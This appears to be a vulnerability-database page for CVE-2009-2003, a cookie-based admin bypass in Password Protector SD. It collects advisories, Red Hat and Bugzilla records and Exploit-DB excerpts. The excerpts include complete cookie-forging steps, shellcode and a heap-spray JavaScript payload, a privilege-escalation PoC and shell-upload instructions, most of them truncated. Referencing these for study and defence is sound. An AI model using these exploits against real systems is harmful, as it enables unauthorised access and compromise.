CVE-2009-2003
published 2009-06-08
CVE-2009-2003: Ascad Networks Password Protector SD 1.3.1 allows remote attackers to bypass authentication and gain administrative access by setting the (1) c7portal and (2)…
Priority P353 high, 7.5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.51% (82.8th percentile)
Ascad Networks Password Protector SD 1.3.1 allows remote attackers to bypass authentication and gain administrative access by setting the (1) c7portal and (2) cookname cookies to "admin."
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ascadnetworks | password_protector_sd | — | — |
CVSS provenance
nvd v2.0 7.5 HIGH AV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat 6.5 MEDIUM
GHSA
GHSA-9phf-78xf-gm33: Ascad Networks Password Protector SD 1
ghsa_unreviewed·2022-05-02
CVE-2009-2003 [HIGH] CWE-287 GHSA-9phf-78xf-gm33: Ascad Networks Password Protector SD 1
Ascad Networks Password Protector SD 1.3.1 allows remote attackers to bypass authentication and gain administrative access by setting the (1) c7portal and (2) cookname cookies to "admin."
Red Hat
FreeRADIUS: Missing check for Tunnel-Password attributes with zero length (DoS) -- re-appearance of CVE-2003-0967
vendor_redhat·2009-09-07·CVSS 5.0
CVE-2009-3111 [MEDIUM] FreeRADIUS: Missing check for Tunnel-Password attributes with zero length (DoS) -- re-appearance of CVE-2003-0967
FreeRADIUS: Missing check for Tunnel-Password attributes with zero length (DoS) -- re-appearance of CVE-2003-0967
The rad_decode function in FreeRADIUS before 1.1.8 allows remote attackers to cause a denial of service (radiusd crash) via zero-length Tunnel-Password attributes, as demonstrated by a certain module in VulnDisco Pack Professional 7.6 through 8.11. NOTE: this is a regression error related to CVE-2003-0967.
Red Hat
neon: billion laughs DoS attack
vendor_redhat·2009-08-18·CVSS 6.5
CVE-2009-2473 [MEDIUM] neon: billion laughs DoS attack
neon: billion laughs DoS attack
neon before 0.28.6, when expat is used, does not properly detect recursion during entity expansion, which allows context-dependent attackers to cause a denial of service (memory and CPU consumption) via a crafted XML document containing a large number of nested entity references, a similar issue to CVE-2003-1564.
Package: gnome-vfs2 (Red Hat Enterprise Linux 4) - Will not fix
Red Hat
apr-util billion laughs attack
vendor_redhat·2009-06-01·CVSS 6.5
CVE-2009-1955 [MEDIUM] apr-util billion laughs attack
apr-util billion laughs attack
The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.
No detection rules found.
Exploit-DB
Adobe (Multiple Products) - XML Injection File Content Disclosure
exploitdb·2017-04-07
CVE-2009-3960 Adobe (Multiple Products) - XML Injection File Content Disclosure
Adobe (Multiple Products) - XML Injection File Content Disclosure
---
#!/bin/bash
#
# Exploit Title: Adobe XML Injection file content disclosure
# Date: 07-04-2017
# Exploit Author: Thomas Sluyter
# Website: https://www.kilala.nl
# Vendor Homepage: http://www.adobe.com/support/security/bulletins/apsb10-05.html
# Version: Multiple Adobe products
# Tested on: Windows Server 2003, ColdFusion 8.0 Enterprise
# CVE : 2009-3960
#
# Shell script that let's you exploit a known XML injection vulnerability
# in a number of Adobe products, allowing you to read files that are otherwise
# inaccessible. In Metasploit, this is achieved with auxiliary:scanner:adobe_xml_inject
# This script is a Bash implementation of the PoC multiple/dos/11529.txt.
#
# According to the original Metasploit code, this atta
Exploit-DB
Microsoft Word 2003 - Record Parsing Buffer Overflow (MS09-027) (Metasploit)
exploitdb·2011-04-16
CVE-2009-0565 Microsoft Word 2003 - Record Parsing Buffer Overflow (MS09-027) (Metasploit)
Microsoft Word 2003 - Record Parsing Buffer Overflow (MS09-027) (Metasploit)
---
##
# $Id: ms09-027 10477 2011-04-13 11:59:02Z mc $
##
##
# This file is not part of the Metasploit Framework and may not be subject to
# redistribution and commercial restrictions.
##
#TODO some testing to find the real banned characters and maxlen
# add those parameters to the .rb file
# drop in appropriate directory
# ulimit -s 100000 is required to run this exploit appropriately
require 'msf/core'
#require 'zlib'
class Metasploit3 'MS Word Record Parsing Buffer Overflow(MS-09-027)',
'Description' => %q{
MS Word Record Parsing Buffer Overflow(MS-09-027)
Vulnerable application MS office 2003
Tested on XP SP2 - MS Office 2003 v. 11.5604.5606
Bug Found By Wushi of team509
Greets Villy, Abhishek Lyall and A
Exploit-DB
Microsoft Excel - FEATHEADER Record (MS09-067)
exploitdb·2010-08-21·CVSS 7.8
CVE-2009-3129 [HIGH] Microsoft Excel - FEATHEADER Record (MS09-067)
Microsoft Excel - FEATHEADER Record (MS09-067)
---
#MS Excel Malformed FEATHEADER Record Exploit
#CVE-2009-3129, MS09-067, OSVDB-59860
#Vulnerable application MS office 2003/2007
#Tested on XP SP2 - MS Office 2003 v. 11.5604.5606
#Sean Larsson - Original Discovery
#!/usr/bin/python
import sys
import zlib
#Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes by RubberDuck =)
shellcode = (
Exploit-DB
Microsoft Word - Record Parsing Buffer Overflow (MS09-027)
exploitdb·2010-08-20
CVE-2009-0565 Microsoft Word - Record Parsing Buffer Overflow (MS09-027)
Microsoft Word - Record Parsing Buffer Overflow (MS09-027)
---
#MS Word Record Parsing Buffer Overflow(MS-09-027)
#Vulnerable application MS office 2003
#Tested on XP SP2 - MS Office 2003 v. 11.5604.5606
#Bug Found By Wushi of team509
#!/usr/bin/python
import sys
import zlib
#windows/exec - CMD=calc.exe
shellcode = (
Exploit-DB
Microsoft Windows Outlook Express and Windows Mail - Integer Overflow
exploitdb·2010-05-11·CVSS 9.3
CVE-2010-0816 [CRITICAL] Microsoft Windows Outlook Express and Windows Mail - Integer Overflow
Microsoft Windows Outlook Express and Windows Mail - Integer Overflow
---
Application: Microsoft Outlook Express
Microsoft Windows Mail
Platforms: Windows 2000
Windows XP
Windows Vista
Windows server 2003
Windows Server 2008 SR2
Exploitation: Remote Exploitable
CVE Number: CVE-2010-0816
Discover Date: 2009-09-11
Author: Francis Provencher (Protek Research Lab's)
Website: http://www.protekresearchlab.com
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) Products affected
5) The Code
#####################################################################################
1) Introduction
Windows Mail is an e-mail and newsgroup client included in Windows Vista, that was superseded by Wind
Exploit-DB
HP OpenView Network Node Manager (OV NNM) - 'OvWebHelp.exe' CGI Topic Overflow
exploitdb·2010-03-30
CVE-2009-4178 HP OpenView Network Node Manager (OV NNM) - 'OvWebHelp.exe' CGI Topic Overflow
HP OpenView Network Node Manager (OV NNM) - 'OvWebHelp.exe' CGI Topic Overflow
---
#!/usr/bin/python
# Exploit title: HP OpenView NNM OvWebHelp.exe CGI Topic overflow
# Date: 2010.03.30
# Software link: hp.com
# Version: 7.53
# Tested on: Windows 2003 SP2
# CVE: 2009-4178
# Code:
############################################
# Trying 172.16.29.130...
# Connected to 172.16.29.130.
# Escape character is '^]'.
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:\Program Files\HP OpenView\www\cgi-bin>
############################################
import struct
import socket
import httplib
import urllib
#[*] x86/alpha_mixed succeeded with size 746 (iteration=1)
sc =(
"\x89\xe3\xd9\xc3\xd9\x73\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x4
Exploit-DB
Microsoft IIS - ASP Multiple Extensions Security Bypass 5.x/6.x Vulnerabilities
exploitdb·2009-12-30
Microsoft IIS - ASP Multiple Extensions Security Bypass 5.x/6.x Vulnerabilities
Microsoft IIS - ASP Multiple Extensions Security Bypass 5.x/6.x Vulnerabilities
---
#!/usr/bin/python
#
# Exploit Title: Exploit for Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x
# Date: 29 dec 2009
# Author: Emanuele 'emgent' Gentili and Emanuele 'crossbower' Acri
# Software Link: N/A
# Version: IIS 5.x/6.x
# Tested on: Windows 2003 Server SP2
# CVE : N/A
# Code : http://www.backtrack.it/~emgent/exploits/IIS-asp.py
# Special greetz. Carlo Velletri ([email protected])
#
# Vulnerability Description:
# The Vulnerability discovered in Microsoft Internet Information Services (IIS) can be exploited by malicious people to potentially bypass
# certain security restrictions and compromise a vulnerable system.
# The vulnerability is caused due to the web server incorrectly exe
Exploit-DB
ASP Simple Blog 3.0 - Arbitrary File Upload
exploitdb·2009-12-28
ASP Simple Blog 3.0 - Arbitrary File Upload
ASP Simple Blog 3.0 - Arbitrary File Upload
---
| # Title : ASP Simple Blog version 3.0 Upload shell Vulnerability |
| # Author : indoushka |
| # email : [email protected] |
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
| # EDB-ID : |
| # CVE-ID : () |
| # OSVDB-ID : () |
| # Date :16/12/2009 |
| # Verified : |
| # Web Site : www.iq-ty.com |
| # Published: |
| # Script : ASP Simple Blog version 3.0 Copyright (c) 2003-2006 www.8pixel.net |
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
| # Bug : XSS |
====================== Exploit By indoushka =================================
| # Exploit :
|
| 1- http://127.0.0.1/simpleblog3/admin/includes/FCKeditor/editor/filemanager/upload/test.html
|
========
Exploit-DB
Simplicity oF Upload 1.3.2 - Arbitrary File Upload
exploitdb·2009-12-20
CVE-2009-4818 Simplicity oF Upload 1.3.2 - Arbitrary File Upload
Simplicity oF Upload 1.3.2 - Arbitrary File Upload
---
# Exploit Title: Simplicity oF Upload (1.3.2) Remote File Upload Vulnerability
# Date: 20-12-2009
# Author: Master Mind
# Software Link: http://www.phpsimplicity.com/scripts.php?id=3
# Version: 1.3.2
# CVE : [N/A]
# Tested on: Windows 2003 Server
~ Script Name : Simplicity oF Upload (1.3.2)
~ Language : php
~ Download Page : http://www.phpsimplicity.com/scripts.php?id=3
~ Author : Master Mind
~ Home : www.shdowskill.com , www.vbspiders.com
Dork : Powered By: © Simplicity oF Upload
Exploit :
http://{target}/[script path/upload.php
upload you shell [Shell.php.gif]
Enjoy :)
Greets : The Electronic Bomb , Twi[L]ighT , R3D EYE, Doom[PS] , AND ALL MEMBERS.
Exploit-DB
Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 - Collab getIcon Universal
exploitdb·2009-09-03·CVSS 8.8
CVE-2009-0927 [HIGH] Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 - Collab getIcon Universal
Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 - Collab getIcon Universal
---
#!/usr/bin/env python
#
# *** Acrobat Reader - Collab getIcon universal exploiter ***
# evil_pdf.py, tested on Operating Systems:
# Windows XP SP3 English/French
# Windows 2003 SP2 English
# with Application versions:
# Adobe Reader 9.0.0/8.1.2 English/French
# Test methods:
# Standalone PDF, embedded PDF in Firefox 3.0.13 and Internet Explorer 7
# 24/06/2009 - Created by Ivan Rodriguez Almuina (kralor). All rights reserved.
# [Coromputer] raised from the ashes.
#
http://www.coromputer.net/CVE-2009-0927_package.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9579.zip (2009-CVE-2009-0927_package.zip)
# milw0rm.com [2009-09-03]
Exploit-DB
Microsoft Windows Server 2003 - '.EOT' Blue Screen of Death Crash
exploitdb·2009-08-11
CVE-2009-3020 Microsoft Windows Server 2003 - '.EOT' Blue Screen of Death Crash
Microsoft Windows Server 2003 - '.EOT' Blue Screen of Death Crash
---
MS Windows 2003 (EOT File) BSOD Crash Exploit
author: webDEViL
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9417.zip (2009-wwbsod.zip)
# milw0rm.com [2009-08-11]
Exploit-DB
Ascad Networks 5 - Products Insecure Cookie Handling
exploitdb·2009-05-14
CVE-2009-2003 Ascad Networks 5 - Products Insecure Cookie Handling
Ascad Networks 5 - Products Insecure Cookie Handling
---
Ascad Networks 5 Products Insecure Cookie Handling Vulnerability
[»] Script:.............[ Ascad Networks Scripts ]....................
[»] Website:............[ http://www.ascadnetworks.com ]..............
[»] Today:..............[ 1305009 ]...................................
[»] Founder:............[ G4N0K | mail[.]ganok[sh!t]gmail.com ].......
[+] c7 Portal <= v1.1.0
Live...: http://hatcocorporati
Exploit-DB
Password Protector SD 1.3.1 - Insecure Cookie Handling
exploitdb·2009-05-13
CVE-2009-2003 Password Protector SD 1.3.1 - Insecure Cookie Handling
Password Protector SD 1.3.1 - Insecure Cookie Handling
---
+++++++++++++++++++ information +++++++++++++++++++++++
[+] Script : Password Protector SD v1.3.1 Insecure Cookie Handling Vulnerability
[+] Found by : Mr.tro0oqy
[+] C0ntact : [email protected]
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
exploit:
step 1 [add]: javascript:document.cookie="c7portal=admin;path=/";
step 2 [add]: javascript:document.cookie="cookname=admin;path=/";
step 3 [to login] : http://localhost/cgi-bin/ppSD/admin.pl?L=home
in control panel :
http://www.passwordprotectorsd.com/cgi-bin/ppSD/admin.pl?L=home
demo:
http://www.passwordprotectorsd.com/cgi-bin/c7/admin.pl
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
ThE g0bL!N - spyboy - red virus - virus_hima - Red-D3v1L
Cyb3r-DeViL-
Exploit-DB
Microsoft Windows XP/Vista/2003/2008 - WMI Service Isolation Privilege Escalation
exploitdb·2009-04-14
CVE-2009-0078 Microsoft Windows XP/Vista/2003/2008 - WMI Service Isolation Privilege Escalation
Microsoft Windows XP/Vista/2003/2008 - WMI Service Isolation Privilege Escalation
---
source: https://www.securityfocus.com/bid/34442/info
Microsoft Windows is prone to a privilege-escalation vulnerability.
Successful exploits may allow attackers to elevate their privileges to LocalSystem, which would facilitate the complete compromise of affected computers.
The issue affects the following:
Windows XP SP2
Windows Server 2003
Windows Vista
Windows Server 2008
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6705.zip
Exploit-DB
Microsoft Windows XP/2003 - RPCSS Service Isolation Privilege Escalation
exploitdb·2009-04-14
CVE-2009-0079 Microsoft Windows XP/2003 - RPCSS Service Isolation Privilege Escalation
Microsoft Windows XP/2003 - RPCSS Service Isolation Privilege Escalation
---
source: https://www.securityfocus.com/bid/34443/info
Microsoft Windows is prone to a privilege-escalation vulnerability.
Successful exploits may allow attackers to elevate their privileges to LocalSystem, which would facilitate the complete compromise of affected computers.
The issue affects the following:
Windows XP SP2
Windows Server 2003
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6705.zip
Exploit-DB
Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (MS09-002)
exploitdb·2009-02-20
CVE-2009-0076 Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (MS09-002)
Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (MS09-002)
---
var c=unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
var array = new Array();
var ls = 0xd00000;
var b = unescape("%u0c0c%u0c0c");
while(b.lengthwindow.setTimeout("ok();",800);
# milw0rm.com [2009-02-20]
Exploit-DB
Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)
exploitdb·2009-02-20
CVE-2009-0076 Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)
Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)
---
#!/usr/bin/env python
###############################################################################
# MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) #
###############################################################################
# #
# Thanks to str0ke for finding this in the wild. #
# #
# Tested on Windows 2003 SP2 R2 #
# #
# Written by SecureState R&D Team (ReL1K) #
# http://www.securestate.com #
# #
# win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind #
# #
###############################################################################
from BaseHTTPServer import HTTPServer
from BaseHTTPServer import BaseHTTPRequestHandler
import sys
try:
import psyco
psyco.full()
except ImportErro
Exploit-DB
FeedMon 2.7.0.0 - outline Tag Buffer Overflow (PoC)
exploitdb·2009-02-05
CVE-2009-0546 FeedMon 2.7.0.0 - outline Tag Buffer Overflow (PoC)
FeedMon 2.7.0.0 - outline Tag Buffer Overflow (PoC)
---
#!/usr/bin/perl -w
################################################################################
# Reference:
# http://security.bkis.vn/?p=329
# https://www.securityfocus.com/bid/33630/info
#
# Tested on Windows Server 2003 with FeedMon 2.7.0.0. FeedMon crashes
# whenever I am trying to Unsubscribe from the malicious(overlylong) feed.
#
# Thanx to milw0rm, str0ke, security.bkis, @rp m@n, evilfingers
# and all security researchers.
#
#$$$$$ This was strictly written for educational purpose. Use it at
#$$$$$ your own risk. Author will not bear any responsibility for any
#$$$$$ damages whatsoever.
#
#####MOST OF THE CODE I GOT FROM###############################################
#####http://search.cpan.org/~madghoul/XML-OPML-0.26/OPML
Exploit-DB
Microsoft Windows XP/2000/2003 - Desktop Wall Paper System Parameter Privilege Escalation
exploitdb·2009-02-02
CVE-2009-1808 Microsoft Windows XP/2000/2003 - Desktop Wall Paper System Parameter Privilege Escalation
Microsoft Windows XP/2000/2003 - Desktop Wall Paper System Parameter Privilege Escalation
---
// source: https://www.securityfocus.com/bid/35120/info
Microsoft Windows is prone to a local privilege-escalation vulnerability.
Attackers may exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will facilitate the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.
#include <windows.h>
int main()
{
WCHAR c[1000] = {0};
memset(c, 'c', 1000);
SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, (PVOID)c, 0);
WCHAR b[1000] = {0};
SystemParametersInfo(SPI_GETDESKWALLPAPER, 1000, (PVOID)b, 0);
return 0;
}
Exploit-DB
FreeRadius 0.x/1.1.x - Tag Field Heap Corruption
exploitdb·2003-11-20
CVE-2003-0967 FreeRadius 0.x/1.1.x - Tag Field Heap Corruption
FreeRadius 0.x/1.1.x - Tag Field Heap Corruption
---
source: https://www.securityfocus.com/bid/9079/info
FreeRADIUS is prone to a heap-corruption vulnerability when handling tag-field input. An attacker may be able to exploit this issue to deny service to legitimate users of a vulnerable FreeRADIUS server.
This issue was initially reported as a vulnerability in how the software handles 'Tunnel-Password' attribute in Access-Request packets, but the issue turns out to have wider scope, affecting tag-field input in general.
This vulnerability affects FreeRADIUS 0.4.0 through 0.9.2.
UPDATE (September 9, 2009): This issue was fixed in 2003 but reintroduced later. FreeRADIUS 1.1.3 through 1.1.7 are also vulnerable.
bash-2.05$ echo -ne "\x01\x01\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x
Bugzilla
CVE-2009-3111 FreeRADIUS: Missing check for Tunnel-Password attributes with zero length (DoS) -- re-appearance of CVE-2003-0967
bugzilla·2009-09-08·CVSS 5.0
CVE-2009-3111 [MEDIUM] CVE-2009-3111 FreeRADIUS: Missing check for Tunnel-Password attributes with zero length (DoS) -- re-appearance of CVE-2003-0967
CVE-2009-3111 FreeRADIUS: Missing check for Tunnel-Password attributes with zero length (DoS) -- re-appearance of CVE-2003-0967
A missing check for proper form of certain attributes was originally
found in the way FreeRADIUS used to decode specific RADIUS attributes
into data structures. A remote attacker could send a specially-crafted
RADIUS packet to the RADIUS server, leading to a denial of service
(radiusd daemon crash), CVE-2003-0967. This flaw was fixed in upstream
0.9.3 version of FreeRADIUS and re-introduced later.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0967
https://www.kb.cert.org/vuls/id/541574
http://rhn.redhat.com/errata/RHSA-2003-386.html
Upstream patch:
http://github.com/alandekok/freeradius-server/commit/860cad9e02ba344edb0038419e415fe05a9a01f4
Bugzilla
CVE-2009-1955 apr-util billion laughs attack
bugzilla·2009-06-08·CVSS 6.5
CVE-2009-1955 [MEDIUM] CVE-2009-1955 apr-util billion laughs attack
CVE-2009-1955 apr-util billion laughs attack
Common Vulnerabilities and Exposures assigned an identifier CVE-2009-1955 to the following vulnerability:
The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in
Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn
modules in the Apache HTTP Server, allows remote attackers to cause a
denial of service (memory consumption) via a crafted XML document
containing a large number of nested entity references, as demonstrated
by a PROPFIND request, a similar issue to CVE-2003-1564.
Discussion:
*** Bug 503814 has been marked as a duplicate of this bug. ***
---
Public exploit posted to milw0rm:
http://www.milw0rm.com/exploits/8842
Upstream patch:
http://svn.apache.org/viewvc?view=rev&revision=781403
http://marc.info/?l=a
Bugzilla
CVE-2009-0259 openoffice.org: text converter memory corruption via a crafted (1) .doc, (2) .wri, or (3) .rtf Word97 file
bugzilla·2008-12-10·CVSS 9.3
CVE-2009-0259 [CRITICAL] CVE-2009-0259 openoffice.org: text converter memory corruption via a crafted (1) .doc, (2) .wri, or (3) .rtf Word97 file
CVE-2009-0259 openoffice.org: text converter memory corruption via a crafted (1) .doc, (2) .wri, or (3) .rtf Word97 file
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-4841 to
the following vulnerability:
The WordPad Text Converter for Word 97 files in Microsoft Windows 2000
SP4, XP SP2, and Server 2003 SP1 and SP2 allows remote attackers to
execute arbitrary code via a crafted (1) .doc, (2) .wri, or (3) .rtf
Word 97 file that triggers memory corruption, as exploited in the wild
in December 2008. NOTE: As of 20081210, it is unclear whether this
vulnerability is related to a WordPad issue disclosed on 20080925 with
a 2008-crash.doc.rar example, but there are insufficient details to be
sure.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4841
http
2009-06-08
Published